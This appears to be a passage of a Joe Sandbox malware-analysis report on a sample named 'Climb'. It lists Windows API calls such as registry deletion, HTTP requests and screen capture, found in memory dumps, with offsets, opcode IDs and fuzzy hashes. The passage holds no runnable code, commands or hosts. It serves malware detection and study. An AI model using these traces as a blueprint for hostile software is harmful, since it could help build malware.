                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                          • Opcode ID: 9fcf594b87f10c4dcae445c90de7c561c97d9fa3370c62e0d294267407576efd
                                                                                                                                                                          • Instruction ID: 9d282654f1b60afb807948bf19d25360f556da1c858d9778263daf7a2389f35e
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fcf594b87f10c4dcae445c90de7c561c97d9fa3370c62e0d294267407576efd
                                                                                                                                                                          • Instruction Fuzzy Hash: F5F1BE716183409FC714EF25C995B6BBBF5AF88310F14895DF8968B2A2CB31EC45CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AFDCD0), ref: 00AE4B18
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AE4B2A
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00AFDCD0), ref: 00AE4B4F
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00AFDCD0), ref: 00AE4B9B
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,00AFDCD0), ref: 00AE4C05
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 00AE4CBF
                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AE4D25
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00AE4D4F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                          • Opcode ID: 1d6f0266e8d4b1f4887f13659fef1c02e7f129b2758526ae4b61ce5e32f84e4a
                                                                                                                                                                          • Instruction ID: cc4beeafcbc84ae2bcf9e6ba4de936033ff8df5d490cbbfcca9aa1508949c6c0
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6f0266e8d4b1f4887f13659fef1c02e7f129b2758526ae4b61ce5e32f84e4a
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E125E71A00145EFDB14DF95C884EAEBBB9FF89714F248098F909AB251D731ED46CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemCount.USER32(00B329C0), ref: 00AA3F72
                                                                                                                                                                          • GetMenuItemCount.USER32(00B329C0), ref: 00AA4022
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00AA4066
                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 00AA406F
                                                                                                                                                                          • TrackPopupMenuEx.USER32(00B329C0,00000000,?,00000000,00000000,00000000), ref: 00AA4082
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AA408E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                          • Opcode ID: 47e88f947badc5e330154027cfd95821f97e65b5d48ecbb49781701cd287223d
                                                                                                                                                                          • Instruction ID: 9281f22483793463b2b79d60e12449fdbd19ea4aacc30af724cd4b76f8266dc3
                                                                                                                                                                          • Opcode Fuzzy Hash: 47e88f947badc5e330154027cfd95821f97e65b5d48ecbb49781701cd287223d
                                                                                                                                                                          • Instruction Fuzzy Hash: 8471E132A44205BEEF219F69DC49FAABF75FF06364F104216F624AB1E1C7B1A910DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 00AF7823
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AF7897
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AF78B9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF78CC
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00AF78ED
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A60000,00000000), ref: 00AF791C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF7935
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00AF794E
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00AF7955
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AF796D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AF7985
                                                                                                                                                                            • Part of subcall function 00A62234: GetWindowLongW.USER32(?,000000EB), ref: 00A62242
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                          • Opcode ID: 13dc34f128c0aad51ba5d43fca0606a4cdf9f5a33a1d9a660069b7e00453daa1
                                                                                                                                                                          • Instruction ID: 2daf27d9dc7278f39cc5a76c65ee1d9fb461ede6bf7dc77c896f0e5c3980e323
                                                                                                                                                                          • Opcode Fuzzy Hash: 13dc34f128c0aad51ba5d43fca0606a4cdf9f5a33a1d9a660069b7e00453daa1
                                                                                                                                                                          • Instruction Fuzzy Hash: 78716870104248AFD762DF98CC88F7ABBF9FB89304F54456DFA8587261CBB0A946CB51
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00AF9BA3
                                                                                                                                                                            • Part of subcall function 00AF80AE: ClientToScreen.USER32(?,?), ref: 00AF80D4
                                                                                                                                                                            • Part of subcall function 00AF80AE: GetWindowRect.USER32(?,?), ref: 00AF814A
                                                                                                                                                                            • Part of subcall function 00AF80AE: PtInRect.USER32(?,?,?), ref: 00AF815A
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9C0C
                                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AF9C17
                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AF9C3A
                                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AF9C81
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9C9A
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00AF9CB1
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00AF9CD3
                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 00AF9CDA
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00AF9DCD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                          • API String ID: 221274066-3440237614
                                                                                                                                                                          • Opcode ID: 5705a9cde952a8a0a79abc233d6bd67fd4b2a44104b9c2a86e8203508c1759d0
                                                                                                                                                                          • Instruction ID: 21efa21a18c2caf6ddc8e02422689dff38bd4f513d2a384f26c3133ab881e7b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 5705a9cde952a8a0a79abc233d6bd67fd4b2a44104b9c2a86e8203508c1759d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 47619B71108305AFC301EF90DD85EAFBBF9EF88750F50091DF691962A1DB309A4ACB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ADCEF5
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ADCF08
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ADCF1C
                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00ADCF35
                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00ADCF78
                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00ADCF8E
                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ADCF99
                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ADCFC9
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ADD021
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ADD035
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00ADD040
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                          • Opcode ID: 4491b5dfe36d8abf4f56bd0e7623c29909bab4619b47fa7a2f74b1fc9ac0e792
                                                                                                                                                                          • Instruction ID: 78c31abe6e020c200523ce0a0ecd49f3a0a38927d976c6cbcf81518ef22c7ba8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4491b5dfe36d8abf4f56bd0e7623c29909bab4619b47fa7a2f74b1fc9ac0e792
                                                                                                                                                                          • Instruction Fuzzy Hash: C4512AB1500705BFDB22DFA1C988ABA7BBDFB48754F00441AF94696250D734D946EBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AF66D6,?,?), ref: 00AF8FEE
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF8FFE
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9009
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9016
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00AF9024
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9033
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00AF903C
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9043
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9054
                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B00C04,?), ref: 00AF906D
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00AF907D
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00AF909D
                                                                                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00AF90CD
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00AF90F5
                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AF910B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                          • Opcode ID: 0cd7bd6f09dca1205429344bb0233942a03a14fe352469a29b96bdf4120de9e6
                                                                                                                                                                          • Instruction ID: d44310b0ab13d6c050a8b66be04e06a313427e983c75e6e68dc854da5964902e
                                                                                                                                                                          • Opcode Fuzzy Hash: 0cd7bd6f09dca1205429344bb0233942a03a14fe352469a29b96bdf4120de9e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 5541F775600208BFDB22DFE5DC48EBBBBB9EB89715F104158FA05DB260DB709942DB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC154
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEC1D2
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00AEC26A
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00AEC2DE
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00AEC2FC
                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00AEC352
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AEC364
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AEC382
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00AEC3E3
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00AEC3F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                          • Opcode ID: 6fd46ce092f7d91287e03c5d317cbf15431cb0459cc1bd4c788d721be7e4ee21
                                                                                                                                                                          • Instruction ID: 24391200ab50be3fdbe787ffb11cf482f4688d81b64e92ac92a8498d74952098
                                                                                                                                                                          • Opcode Fuzzy Hash: 6fd46ce092f7d91287e03c5d317cbf15431cb0459cc1bd4c788d721be7e4ee21
                                                                                                                                                                          • Instruction Fuzzy Hash: D2C18B35204342AFD711DF65C494F6ABBF1BF84318F18859CE46A8B2A2CB35ED46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00AE3035
                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AE3045
                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00AE3051
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00AE305E
                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AE30CA
                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AE3109
                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AE312D
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00AE3135
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00AE313E
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00AE3145
                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00AE3150
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                          • Opcode ID: 96e5c5c0dc0b2485309e7bee0f173359646c366145f5e65de45773ff89af2c1f
                                                                                                                                                                          • Instruction ID: ad48a3ef3d47419858c0a4695a49cfe43b323851e9329a75fd23d0e3a479c01e
                                                                                                                                                                          • Opcode Fuzzy Hash: 96e5c5c0dc0b2485309e7bee0f173359646c366145f5e65de45773ff89af2c1f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4161F276D00219AFCF05CFE4D988EAEBBB6FF48310F208519E556A7210D771AA41CF90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00AFA990
                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00AFA9A7
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00AFA9B3
                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00AFA9C9
                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00AFAC15
                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AFAC33
                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AFAC54
                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 00AFAC73
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFAC95
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 00AFACBB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 3962739598-2766056989
                                                                                                                                                                          • Opcode ID: ae4ddf341139bd850869e28acb770ac812a2270594b46497347a5e8a81135932
                                                                                                                                                                          • Instruction ID: b520ece6318851e183486649e2c192028c41a7f61cc75ad495e43fa946305fb2
                                                                                                                                                                          • Opcode Fuzzy Hash: ae4ddf341139bd850869e28acb770ac812a2270594b46497347a5e8a81135932
                                                                                                                                                                          • Instruction Fuzzy Hash: 73B166B5600219EBDF14CFA8C9847FE7BB2BF54700F188069FE49AA295D770A981CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00AC52E6
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00AC5328
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AC5339
                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00AC5345
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00AC537A
                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00AC53B2
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00AC53EB
                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00AC5445
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00AC5477
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00AC54EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
